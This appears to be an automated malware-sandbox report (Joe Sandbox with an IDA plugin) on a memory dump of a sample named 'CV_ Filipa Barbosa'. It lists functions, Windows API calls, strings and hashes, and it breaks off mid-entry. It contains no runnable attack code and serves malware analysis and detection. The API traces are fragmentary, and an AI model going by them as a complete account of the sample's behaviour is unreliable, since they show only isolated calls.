Instruction ID: 30bdaa48fc7e148d791dfa1882d78908f60a7bf34b0a64031cb393a03a4364cf
Opcode Fuzzy Hash: e8ce3ae46796bc94974698af9579f0a78bd54171c3461d0fb5857ce7f9198d7d
Instruction Fuzzy Hash: 6D5125721147019BE7179F28C8C17BBB7E8EF86364F150A2DF996D31A0DBA0DD848B52

Function 00330213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0033027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003302B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003302C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00330344

Strings

DllGetClassObject, xrefs: 003302B7

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 529eae04f47c29cbf83a73031fe2d9123283c9613421111f0b8957a3457a54d7
Instruction ID: 7078c6b5bfb73f40c165964c80cedd181889219c76f24799dfb3dff23bfa54e3
Opcode Fuzzy Hash: 529eae04f47c29cbf83a73031fe2d9123283c9613421111f0b8957a3457a54d7
Instruction Fuzzy Hash: 71416D75600204EFDB1ACF64C8E4B9A7BB9EF45320F1580A9ED09DF206D7B5DA44CBA1

Function 00335007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00335075
GetMenuItemInfoW.USER32 ref: 00335091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 003350D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003B1708,00000000), ref: 00335120

Strings

0, xrefs: 0033506D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: a6fb9ee4865f0c2dc1ed37eb45492e16ad79380d348effffc52ee20afffa1cb6
Instruction ID: 9e6da3432b58baa91d27ecdb4e6801d1b5f8299ac024f334a0889d814febbe87
Opcode Fuzzy Hash: a6fb9ee4865f0c2dc1ed37eb45492e16ad79380d348effffc52ee20afffa1cb6
Instruction Fuzzy Hash: 5241E371604701AFDB26DF24DCC0F6AB7E8AF85324F04461EF9959B291D730E940CB62

Function 00350567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00350587

Strings

stdcall, xrefs: 00350609
cdecl, xrefs: 003505DE
none, xrefs: 00350662
winapi, xrefs: 003505F8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: f5c38bfb2cb795aac078132b0594d5b305978948b5b76464c1aba85aea6dbd01
Instruction ID: 8e71f8fd65d3811e5ef5fa43222dc5ab922913182b0d05cb1966fd11f97270df
Opcode Fuzzy Hash: f5c38bfb2cb795aac078132b0594d5b305978948b5b76464c1aba85aea6dbd01
Instruction Fuzzy Hash: EA31D23460021AAFCF06EF54C951DFEB3B4FF55314B104A29E826AB6E1DB72E915CB80

Function 0032B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0032B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0032B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0032B8D1

Strings

ComboBox, xrefs: 0032B815
ListBox, xrefs: 0032B84D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 5d4987bd1571fbcebf585cc22b276257d704d4daf80f078df2812db631259033
Instruction ID: a8936f327ab1aff28cdfedfb2b2ba86a8bf7c83eb0ec23162be64f91f121daa8
Opcode Fuzzy Hash: 5d4987bd1571fbcebf585cc22b276257d704d4daf80f078df2812db631259033
Instruction Fuzzy Hash: F921F376900108BFDB16AB64EC86DFEB77CDF06354B604129F129A71E0DB744D069B60

Function 003443E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00344401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00344427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00344457
InternetCloseHandle.WININET(00000000), ref: 0034449E

Part of subcall function 00345052: GetLastError.KERNEL32(?,?,003443CC,00000000,00000000,00000001), ref: 00345067

Strings

, xrefs: 00344450

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 14525c09806ae5ef577859307cfedcdc6aba1357cdbfe119ed3a0602913ccc0a
Instruction ID: 50ed70398fd99d5872b0c3245c8fc40c25418649f261911f7e14959c92007853
Opcode Fuzzy Hash: 14525c09806ae5ef577859307cfedcdc6aba1357cdbfe119ed3a0602913ccc0a
Instruction Fuzzy Hash: 2B2192B5500608BFE7239F65CC85FBFB6FCEF48754F10802AF509AA240DA64AD459770

Function 003590E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0030D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0030D1BA
Part of subcall function 0030D17C: GetStockObject.GDI32(00000011), ref: 0030D1CE
Part of subcall function 0030D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0030D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0035915C
LoadLibraryW.KERNEL32(?), ref: 00359163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00359178
DestroyWindow.USER32(?), ref: 00359180

Strings

SysAnimate32, xrefs: 00359137

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 9ba95c12337aa10a0785c3c6b9e2a074388548c303cbc8f699a7468443fa37b0
Instruction ID: 081ffca7663f1b664a0436e8e5ea61796aefa6204586f502cdea56e55ce3c8b1
Opcode Fuzzy Hash: 9ba95c12337aa10a0785c3c6b9e2a074388548c303cbc8f699a7468443fa37b0
Instruction Fuzzy Hash: 1B21DB71200616FBEF224E649C88FBB33ADEF99365F11061AFD14961A0C735CD46A760

Function 00339568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00339588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003395B9
GetStdHandle.KERNEL32(0000000C), ref: 003395CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00339605

Strings

nul, xrefs: 00339600

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: ca045a9fe215335c3f3f6328a96abe83efe78b1e36cbd2c2b59aca244fa1e256
Instruction ID: cd1821d2ce352aa0d2fa613b025a8bca750327f71adc84155df4d710af963b8a
Opcode Fuzzy Hash: ca045a9fe215335c3f3f6328a96abe83efe78b1e36cbd2c2b59aca244fa1e256
Instruction Fuzzy Hash: D0216271500205EBEB229F25DC85B9A77FCEF46720F204A1AF9A5D72D0D7B0D985CB10

Function 00339634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00339653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00339683
GetStdHandle.KERNEL32(000000F6), ref: 00339694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003396CE

Strings

nul, xrefs: 003396C9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 909cef07bfb866e6c31b2599ab2dd851c5bee2cb74bd09f67f6ffb9459837e57
Instruction ID: f716fe3a8095cc2f8ececa3b766a9b541b85c809e30826139e78e7abecca2692
Opcode Fuzzy Hash: 909cef07bfb866e6c31b2599ab2dd851c5bee2cb74bd09f67f6ffb9459837e57
Instruction Fuzzy Hash: DF214171601205DBDB229F699C86F9A77FCAF95734F200A1AF8A1E72D0D7B09845CB50

Function 0033DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0033DB5E
__swprintf.LIBCMT ref: 0033DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0038DC00), ref: 0033DBB5

Strings

%lu, xrefs: 0033DB71

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: dbceea8efcc546b4c24106acc425e2fa226de318014b3b1b25c2e92a73c58b3b
Instruction ID: 2a7ed0f3673ee3c24b71a51134a24da39454ce59b007ca233fb9e392d86b415f
Opcode Fuzzy Hash: dbceea8efcc546b4c24106acc425e2fa226de318014b3b1b25c2e92a73c58b3b
Instruction Fuzzy Hash: BA214135600108AFCB11EF64D985DEEBBB8EF49704F104069F609EB251DB71EA41CB61

Function 0032C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0032C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032C84A
Part of subcall function 0032C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0032C85D
Part of subcall function 0032C82D: GetCurrentThreadId.KERNEL32 ref: 0032C864
Part of subcall function 0032C82D: AttachThreadInput.USER32(00000000), ref: 0032C86B

GetFocus.USER32 ref: 0032CA05

Part of subcall function 0032C876: GetParent.USER32(?), ref: 0032C884

GetClassNameW.USER32(?,?,00000100), ref: 0032CA4E
EnumChildWindows.USER32(?,0032CAC4), ref: 0032CA76
__swprintf.LIBCMT ref: 0032CA90

Strings

%s%d, xrefs: 0032CA8A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 9d56714e6ffb9ae55838593e0698e4c593d3d7758fbb24a8d642781e8d375a86
Instruction ID: 28428b57bfd56b031b011d1ad67eb4ed1b8ab284f9bcff96f64f8ecff5f38738
Opcode Fuzzy Hash: 9d56714e6ffb9ae55838593e0698e4c593d3d7758fbb24a8d642781e8d375a86
Instruction Fuzzy Hash: 7111B1716202197BCB12BFA0EC89FEE777CAF54700F009066FE08AA182DB709945CB71

Function 00317A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00317AD8

Part of subcall function 00317CF4: __mtinitlocknum.LIBCMT ref: 00317D06
Part of subcall function 00317CF4: EnterCriticalSection.KERNEL32(00000000,?,00317ADD,0000000D), ref: 00317D1F

InterlockedIncrement.KERNEL32(?), ref: 00317AE5
__lock.LIBCMT ref: 00317AF9
___addlocaleref.LIBCMT ref: 00317B17

Strings

`7, xrefs: 00317AA3

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `7
API String ID: 1687444384-4141358569
Opcode ID: 30f34593c02a7fab6bf838edea6894ed24d33132d80d191651be5380df8e3c40
Instruction ID: 478f368f680685fe1018f392b824018abeb0062d21c7263d77506f22cd9a2571
Opcode Fuzzy Hash: 30f34593c02a7fab6bf838edea6894ed24d33132d80d191651be5380df8e3c40
Instruction Fuzzy Hash: 60016175408B009FD736DF75D906789F7F0EF48325F24890EE49A9B6A0CBB4A680CB51

Function 0035E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0035E33D
_memset.LIBCMT ref: 0035E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003B3D00,003B3D44), ref: 0035E37B
CloseHandle.KERNEL32 ref: 0035E38D

Strings

D=;, xrefs: 0035E346

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=;
API String ID: 3277943733-1395744148
Opcode ID: 1dab7300be7a4f4b4df68cb55c5c0965c1a69fdda583679455b4cb1a2ede72f9
Instruction ID: fd2e48958d436a236d5b90920683ca1c62d219c72cae76ba88dcf6e4f1df7cd7
Opcode Fuzzy Hash: 1dab7300be7a4f4b4df68cb55c5c0965c1a69fdda583679455b4cb1a2ede72f9
Instruction Fuzzy Hash: B6F082F5540324BEF3121B60AC55FB77E6CDB08B58F004925FF08DA1A2D3759E4086A8

Function 00351945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003519F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00351A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00351B49
CloseHandle.KERNEL32(?), ref: 00351BBF

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: bcb1ec923b996d57b7bd10b6fce8a367dec4d658d84df4414682baaca6782c8f
Instruction ID: 2121731453fa61b3f0e9a8ce4353dc19fa0fa55912bf97328f35088609c8caa1
Opcode Fuzzy Hash: bcb1ec923b996d57b7bd10b6fce8a367dec4d658d84df4414682baaca6782c8f
Instruction Fuzzy Hash: BA817270601204ABDF22EF64C896FAEBBE5AF04720F158459F905AF3D2D7B4A945CF90

Function 00331C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00331CB4
VariantClear.OLEAUT32(00000013), ref: 00331D26
VariantClear.OLEAUT32(00000000), ref: 00331D81
VariantClear.OLEAUT32(?), ref: 00331DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00331E26

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 5fc7332eda38641df6dc702a57493f57fdf2dc1b1ac2f3102f1be2e908cf723d
Instruction ID: 018145a7892dae292d971457296e722d9d3952f84ba3a6f2ad531f8ce5ffe10b
Opcode Fuzzy Hash: 5fc7332eda38641df6dc702a57493f57fdf2dc1b1ac2f3102f1be2e908cf723d
Instruction Fuzzy Hash: 7F5137B5A00209AFDB25CF58C880AAAB7B8FF4D314F158559E959DB301E730EA51CFA0

Function 00350688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003506EE
GetProcAddress.KERNEL32(00000000,?), ref: 0035077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0035079B
GetProcAddress.KERNEL32(00000000,?), ref: 003507E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 003507FB

Part of subcall function 0030E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0033A574,?,?,00000000,00000008), ref: 0030E675
Part of subcall function 0030E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0033A574,?,?,00000000,00000008), ref: 0030E699

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 555abef916b7b0384b07b4214a84cc1154fdc18f661a687cf2b707f3d43d316a
Instruction ID: 74ee174c19ba4555b11dfc24f369ef934cc3c0732de6e3fb5b6f5342c2302355
Opcode Fuzzy Hash: 555abef916b7b0384b07b4214a84cc1154fdc18f661a687cf2b707f3d43d316a
Instruction Fuzzy Hash: 7F512775A00209DFCB05EFA8C591DADF7B9BF48310B158065EA56AB362DB31ED45CF80

Function 00352E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00353C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00352BB5,?,?), ref: 00353C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00352EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00352F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00352F75
RegCloseKey.ADVAPI32(?,?), ref: 00352FA1
RegCloseKey.ADVAPI32(00000000), ref: 00352FAE

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: ca467e29f95d49f89200672e85f094eaf9fea21feb5f1f431f0a26ae9650f299
Instruction ID: 6bf0e2483da9d56220f647bf9a2ff9053e4918fac8dd446242c887e6a8b9783e
Opcode Fuzzy Hash: ca467e29f95d49f89200672e85f094eaf9fea21feb5f1f431f0a26ae9650f299
Instruction Fuzzy Hash: 5A514A71218208AFD705EF54C881E6BB7F9FF88344F10482DFA959B2A1DB30E918CB52

Function 0035CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

